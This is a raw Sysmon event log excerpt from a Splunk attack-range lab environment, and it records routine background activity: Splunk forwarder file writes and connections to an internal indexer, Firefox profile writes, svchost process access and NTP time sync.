Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2563DC22F0C172DBC6631FA214119EE3,SHA256=C67ABEE90EC75E0F56B28DC7AD6BCD3B7495DD4FFCCE5B81D79538E9D237E5C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.656{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49464-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:24.675{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FBC23A0F6F13C26B5E8CA1D9D3F0BE,SHA256=AAA17E9C5C53416DB8DD223C0556C42C93A3B59B2B351CE82B2CBABB19F7BCCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:24.341{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBCBF377AA2EDE3BD39727F4BA243BC5,SHA256=3BEB643C268CF9F5D95F48811EC3A32BB6BD6B4AB15F489A95B5A60C22A24E02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:25.691{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21E16F425A295FC0ACCF0743E507C487,SHA256=44CF03F33CCB5A90452F6649AC3406C055DE689B53FC05F1A14A4347676A8113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:25.559{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A7B249FB20BA711ECFE9A9F8D6C72C8,SHA256=E2E0717C90D620EDFEBB2C0BE19F57D12B01692790C892A4F9C34243667259BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:25.044{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=ED46BA4F6A4D2A3C177DDEDC4C89FC2F,SHA256=9ACC9F16B85E7668DFA534E761C6C5B9A3D179D851CE08B1B5B6178D63C3FF7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:26.705{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7852BAD6A3085D9A67A41C055FF20823,SHA256=988AC2867AEEE6646F344BC21710842007C21A978CF4C68798FB855AD75F2D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:26.606{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4083B5C7C659E051488DD28613D059B,SHA256=857AA184C2FE4232C69D4BE32062F3113B91CC67177F4467B85C48A076B3BEBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:26.010{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000297657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:26.009{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:26.009{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF971c53.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:27.794{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8811B736AF73AE28CBFE8496BDF35F7,SHA256=8F708BBE0B45258A6538374CA37B85DE89B15734D9FBBA46F27CD5D20E5E7F0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:27.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942728E9121D96C64A08EA22296AD54C,SHA256=18B48F11222F8E3BEE12406EED26DA2430C24D787AA03ED868DFFBC6D731405C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:27.004{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000221482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:24.496{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51654-false10.0.1.12-8000- 23542300x8000000000000000221484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:28.809{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC9521A0DA675BABBB45E82E00F8663,SHA256=0AEAA4E39043A20EB8F68175671999B1534F43DBDF8B6BF6C9521113617B818C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:28.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82535F744480F786B9EEEC0C172EA41B,SHA256=AA13CCBD37D231F9AB157AA001D5334B09B0676690569386DD7BF6A296849E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:29.856{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72DC13E0C8F36FC9D4D564C12CC58350,SHA256=AC73F5675C8494FD95BB03ECB6D4BBCC70B8836DC9DF4C184ABE8E31D41EC807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:29.764{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACD6AC5D56C2704A6FE2EFCE1FA02744,SHA256=0415AD4899386A1A1008BAF1B1F383FF13DF29CDCEB1467B6C25B1CD0FBC81D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:26.508{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49465-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:30.887{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F91944149D0DBDCA236C87E7AEE01069,SHA256=83BE25D1CB60FB0FADCCBE27B5EB95AE28F188265FD81CB6FB1847B1E143F687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:30.774{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B4DBEAA7AA8D046EA85ECFFD99A5814,SHA256=8115D8DCA643DFE330CB9CA4D9F6820C98BF29D5B5BF483A7D5E16B5AFEE304E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:30.466{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4007F9EB1688FEAB94AF8EA4426B3C13,SHA256=1D6F06E816D9FA545C961B094FD05DFF4D047E167051B2ECE350335C13167BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:31.950{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB6747B7E4B77CF921A022A5C17EE6F,SHA256=AB8BCD6BFED38E41676A522BE0C83064A7CD84C93A29298E75A277549D6B8D7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:31.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09ADECF5D8FC7061899848F25DB8C0EC,SHA256=DAB065D991CB2B92432C918639847E22A158F6F20110225690D3D8BF99ADBF0F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000221489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:17:31.356{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a6-0xf2f9cdc9) 354300x8000000000000000221488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:29.573{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51655-false10.0.1.12-8000- 23542300x8000000000000000297667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:32.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E59B565D6C57ACC8A7EE2BDF22BD36,SHA256=9B58779DE59E37D404750DE445F866ECA6E8469A73342433C9C2FDF52B606782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:33.839{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=403559B5AB03782CC42BDC8872BC14BC,SHA256=953F146A3F1110985D0360C1A94F8528AAB358FF6F63B3CFCB617E8700E9AB16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:30.791{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal123ntpfalse169.254.169.123-123ntp 23542300x8000000000000000221491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:33.106{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=355C7048E3A6FEB73F654C2CDA9C78F9,SHA256=3F5D470D7AC94AF3F9EC27305078F4C53156260A8D7459072F6E8C7C24573752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:33.577{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4C735468B4EC002E165C6490E0E0F1D4,SHA256=2DB0A0C4EEFDE27018A6A3F51584D23DAB184F5C8889979BC15F8915D7F6FFC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:34.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B5166BFCFC19956A98789ADC84EA80,SHA256=2BC2B0CEEC0317125D4ABCF15EFE1ED085D8B1F8BA120AAED15CBE474AFA9ACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:34.170{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F106A3BB211A844AC4E85CDC4612C4D,SHA256=B920677A5C5438B4939CC7695BA985670D31CEAC237BA3A2A975642D83266B5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:31.710{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49466-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:35.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8F5865C8E70A9CE7E2CD22B089720FF,SHA256=C59F4A085B4753BC520C090E18E62F00DD323615A358185DAC3CACD5F771D548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:35.389{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A0242B6CCC54F728F042992D58BE73,SHA256=6BE47F9EE358C746504D695B231C06E8E57F61B525949A42EF66F28C7AD219D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:36.915{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F79E51B103F273F3CA6A2260AAEBF8F,SHA256=DE19BFA03806A0A0FBED94B76BC194D012E27C96FBD40C5D7F9063334A933B89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:34.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51656-false10.0.1.12-8000- 23542300x8000000000000000221495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:36.435{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=135D14F054474369F18F021D6A4E0A04,SHA256=21EE22E84EDD56991864BBB6D7F61098B1DE1527DAF69005BE117438DF3BA001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:37.918{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65916E05E7D04FEF7D8E82073901F782,SHA256=7B0CBEAEB8158AE0A808A7B86DDC5E9FFF57C146FF6A511B4D95C91EB8B7A7CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:37.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90075936FA572514035C02AD43848330,SHA256=CEB42277D0B9C5C38F387C42B16B41BBCCA5FB514B3A5E828191E9D19696B3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:38.920{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2325112D482ADC91840F2EC5FAF7651,SHA256=4354A8E03F15787217CDFC63110CD5711BB8361720DA1D01DACCF4B643E16394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:38.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F736B9CE12EC706CA878C23339D4AA,SHA256=CD373B30D43BAF9D450118A7CDAA6DDAF5E3A094DF144739E9C4B77253FD9E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:38.026{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-160MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:39.843{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BF939103CDE545C47F65AD8DBC91CB9,SHA256=DE399BEAE15051A87A281BD55B87BCA609A0804917EBD6997A5E3051DAAD56F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:39.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8893D82DFFD0CB9D2DCB17BA892537EA,SHA256=CFBCB3FD6619E3EE1D4C3C14FF9C1CB5854996435F4C50CB42665D3B1575FDD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:37.708{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49467-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 